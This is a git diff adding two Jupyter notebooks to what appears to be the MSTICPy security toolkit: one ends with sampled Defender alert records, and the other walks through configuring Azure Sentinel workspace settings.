+       "      <td>499bdd5330f78dc82d0051c8d7a9eb9d69f88333</td>\n",
+       "      <td>nestorw-win10pro-1803</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>1b3b40fbc889fd4c645cc12c85d0805ac36ba254</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>14968</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>4</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T16:56:18.6397738Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1190</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>5</td>\n",
+       "      <td>da637111835325717564_-1865655676</td>\n",
+       "      <td>2019-12-05T16:05:46.4778106Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>36c5d12033b2eaf251bae61c00690ffb17fddc87</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>2376</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>6</td>\n",
+       "      <td>da637111835325717564_-1865655676</td>\n",
+       "      <td>2019-12-05T16:05:46.4778106Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>notepad.exe</td>\n",
+       "      <td>d487580502354c61808c7180d1a336beb7ad4624</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>2376</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>7</td>\n",
+       "      <td>da637111691253610692_623907060</td>\n",
+       "      <td>2019-12-05T16:50:16.9477916Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>36c5d12033b2eaf251bae61c00690ffb17fddc87</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>915</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>8</td>\n",
+       "      <td>da637111691253610692_623907060</td>\n",
+       "      <td>2019-12-05T16:50:16.9477916Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>8dca9749cd48d286950e7a9fa1088c937cbccad4</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>915</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>9</td>\n",
+       "      <td>da637111536085551266_1012263407</td>\n",
+       "      <td>2019-12-08T15:59:28.1181531Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>8c5437cd76a89ec983e3b364e219944da3dab464</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>130</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                            AlertId                     EventTime  \\\n",
+       "0   da637111553314888493_-215032980  2019-12-08T17:22:37.8742974Z   \n",
+       "1   da637111536085551266_1012263407   2019-12-08T17:11:14.931633Z   \n",
+       "2  da637111470533220658_-1814166510  2019-12-05T12:34:34.7864124Z   \n",
+       "3   da637111448595540767_-885088719  2019-12-05T12:11:25.5486226Z   \n",
+       "4  da637111691236503999_-1316647445  2019-12-05T16:56:18.6397738Z   \n",
+       "5  da637111835325717564_-1865655676  2019-12-05T16:05:46.4778106Z   \n",
+       "6  da637111835325717564_-1865655676  2019-12-05T16:05:46.4778106Z   \n",
+       "7    da637111691253610692_623907060  2019-12-05T16:50:16.9477916Z   \n",
+       "8    da637111691253610692_623907060  2019-12-05T16:50:16.9477916Z   \n",
+       "9   da637111536085551266_1012263407  2019-12-08T15:59:28.1181531Z   \n",
+       "\n",
+       "                                  MachineId             ComputerName  \\\n",
+       "0  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "1  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "2  1e9f8f18585e70ef1f167fbf5e8bf7c3dccc5739       olaa-win10pro-1607   \n",
+       "3  499bdd5330f78dc82d0051c8d7a9eb9d69f88333    nestorw-win10pro-1803   \n",
+       "4  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "5  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "6  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "7  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "8  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "9  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "\n",
+       "        Severity        Category  \\\n",
+       "0         Medium  DefenseEvasion   \n",
+       "1  Informational       Execution   \n",
+       "2  Informational       Execution   \n",
+       "3  Informational       Execution   \n",
+       "4         Medium  DefenseEvasion   \n",
+       "5         Medium  DefenseEvasion   \n",
+       "6         Medium  DefenseEvasion   \n",
+       "7  Informational       Execution   \n",
+       "8  Informational       Execution   \n",
+       "9  Informational       Execution   \n",
+       "\n",
+       "                                            Title           FileName  \\\n",
+       "0           Suspicious process injection observed        notepad.exe   \n",
+       "1  [Test Alert] Suspicious Powershell commandline            cmd.exe   \n",
+       "2  [Test Alert] Suspicious Powershell commandline            cmd.exe   \n",
+       "3  [Test Alert] Suspicious Powershell commandline     powershell.exe   \n",
+       "4           Suspicious process injection observed  RuntimeBroker.exe   \n",
+       "5           Suspicious process injection observed     powershell.exe   \n",
+       "6           Suspicious process injection observed        notepad.exe   \n",
+       "7  [Test Alert] Suspicious Powershell commandline     powershell.exe   \n",
+       "8  [Test Alert] Suspicious Powershell commandline            cmd.exe   \n",
+       "9  [Test Alert] Suspicious Powershell commandline            cmd.exe   \n",
+       "\n",
+       "                                       SHA1 RemoteUrl RemoteIP  ReportId  \\\n",
+       "0  b6d237154f2e528f0b503b58b025862d66b02b73                          454   \n",
+       "1  8c5437cd76a89ec983e3b364e219944da3dab464                          137   \n",
+       "2  99ae9c73e9bee6f9c76d6f4093a9882df06832cf                         4369   \n",
+       "3  1b3b40fbc889fd4c645cc12c85d0805ac36ba254                        14968   \n",
+       "4  7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1190   \n",
+       "5  36c5d12033b2eaf251bae61c00690ffb17fddc87                         2376   \n",
+       "6  d487580502354c61808c7180d1a336beb7ad4624                         2376   \n",
+       "7  36c5d12033b2eaf251bae61c00690ffb17fddc87                          915   \n",
+       "8  8dca9749cd48d286950e7a9fa1088c937cbccad4                          915   \n",
+       "9  8c5437cd76a89ec983e3b364e219944da3dab464                          130   \n",
+       "\n",
+       "                   Table  \n",
+       "0             MiscEvents  \n",
+       "1  ProcessCreationEvents  \n",
+       "2  ProcessCreationEvents  \n",
+       "3  ProcessCreationEvents  \n",
+       "4             MiscEvents  \n",
+       "5             MiscEvents  \n",
+       "6             MiscEvents  \n",
+       "7  ProcessCreationEvents  \n",
+       "8  ProcessCreationEvents  \n",
+       "9  ProcessCreationEvents  "
+      ]
+     },
+     "execution_count": 43,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "query = \"AlertEvents | sample 10\"\n",
+    "mdatp_prov.exec_query(query)"
+   ]
+  }
+ ],
+ "metadata": {
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.1"
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 2
+}
diff --git a/docs/notebooks/MPSettingsEditor.ipynb b/docs/notebooks/MPSettingsEditor.ipynb
new file mode 100644
index 000000000..312af52f0
--- /dev/null
+++ b/docs/notebooks/MPSettingsEditor.ipynb
@@ -0,0 +1,6694 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# MSTICPy Settings \n",
+    "\n",
+    "This notebook takes you through setting up your MSTICPy configuration\n",
+    "for the first time. Some sections are specific to using MSTICPy\n",
+    "with Azure Sentinel.\n",
+    "\n",
+    "You must have msticpy installed to run this notebook:\n",
+    "```\n",
+    "%pip install --upgrade msticpy\n",
+    "```\n",
+    "\n",
+    "MSTICpy versions >= 1.0.0"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "from msticpy.config import MpConfigFile, MpConfigEdit, MpConfigControls\n",
+    "from msticpy.nbtools import nbwidgets\n",
+    "from msticpy.common import utility as utils"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Checking your settings\n",
+    "You can use MpConfigFile from the command line or as an interactive UI to do this.\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "815243e08d1c4aa881b07de4447b5cba",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Textarea(value=\"{'AzureSentinel': {'Workspaces': {'ASIHuntOMSWorkspaceV4': {'TenantId': '72f988…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "mpconfig = MpConfigFile()\n",
+    "mpconfig.load_default()\n",
+    "mpconfig.view_settings()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## If you see nothing ...\n",
+    "...but a pair of curly braces in the settings view above it means\n",
+    "that you should set up a **msticpyconfig.yaml**"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## If you know that you have configured a msticpyconfig file\n",
+    "\n",
+    "You can search for this file using MpConfigFile. Click on **Load file**.\n",
+    "\n",
+    "Once you've done that go to the [Setting the path to your msticpyconfig.yaml](#Setting-the-path-to-your-msticpyconfig.yaml)\n",
+    "\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Import your Config.json and create a msticpyconfig.yaml [Azure Sentinel]\n",
+    "\n",
+    "Follow these steps:\n",
+    "1. Run MpConfigFile\n",
+    "2. Locate your config.json\n",
+    "   - click **Load file** button\n",
+    "   - Browse - use the controls to navigate to find config.json\n",
+    "   - Search - set the starting directory to search and open the **Search** drop-down\n",
+    "   - When you see the file click on it and click **Select File** button (below the file browser)\n",
+    "   - optionally, click **View Settings** to confirm that this looks right\n",
+    "3. Convert to convert to msticpyconfig format\n",
+    "   - click **View Settings**\n",
+    "4. Save the file\n",
+    "   - type a path into the **Current file** text box\n",
+    "   - Click on **Save file**\n",
+    "5. You can set this file to always load by assigning the path to an environment variable.\n",
+    "   See [Setting the path to your msticpyconfig.yaml](#Setting-the-path-to-your-msticpyconfig.yaml)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "mpconfig"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### This is the equivalent from the command line"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "{'AzureSentinel': {'Workspaces': {'ASIHuntOMSWorkspaceV4': {'ResourceGroup': 'ASIHuntOMSWorkspaceRG',\n",
+       "    'SubscriptionId': '40dcc8bf-0478-4f3b-b275-ed0a94f2c013',\n",
+       "    'TenantId': '72f988bf-86f1-41af-91ab-2d7cd011db47',\n",
+       "    'WorkspaceId': '52b1ab41-869e-4138-9e40-2a4457f09bf0'}}}}"
+      ]
+     },
+     "execution_count": 8,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "mpconfig = MpConfigFile()\n",
+    "mpconfig.load_from_file(\"E:\\\\src\\\\asi-jupyter\\\\notebooks\\\\config.json\")\n",
+    "mpconfig.map_json_to_mp_ws()\n",
+    "mpconfig.settings\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Edit your msticpyconfig settings\n",
+    "\n",
+    "## Azure Sentinel Workspaces\n",
+    "\n",
+    "If you loaded a config.json file you should see your workspace displayed. If not,\n",
+    "you can add one or more workspaces here. The Name, WorkspaceId and TenantId are\n",
+    "mandatory. The other fields are helpful but not essential.\n",
+    "\n",
+    "Use the Help drop-down panel to find more information about adding workspaces and finding\n",
+    "the correct values for your workspace.\n",
+    "\n",
+    "If this the workspace that you use frequently or all of the time, you may want to set this as the default.\n",
+    "This creates a duplicate entry named \"Default\" and this is used when you connect to AzureSentinel as\n",
+    "the default workspace to connect to (you can override this by specifying a workspace name at connect time).\n",
+    "\n",
+    "When you've finished, type a file name (usually \"msticpyconfig.yaml\") into the **Conf File** text box\n",
+    "and click **Save File**,\n",
+    "\n",
+    "You can also try the **Validate Settings** button. This should show that you have a few missing\n",
+    "sections (we'll fill these in later) but should show nothing under the the \"Type Validation Results\"."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "AuthKey\n",
+      "AuthKey\n"
+     ]
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "33066883d4cf4568b9a94f08b4a4d404",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Tab(children=(VBox(children=(Label(value='Azure Sentinel workspace settings'), HBox(children=(V…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "mpedit = MpConfigEdit(settings=mpconfig)\n",
+    "mpedit"
+   ]
+  },
+  {
+   "attachments": {
+    "ad05bde6-0765-44de-83f8-d7d6e38030f6.png": {
+     "image/png": "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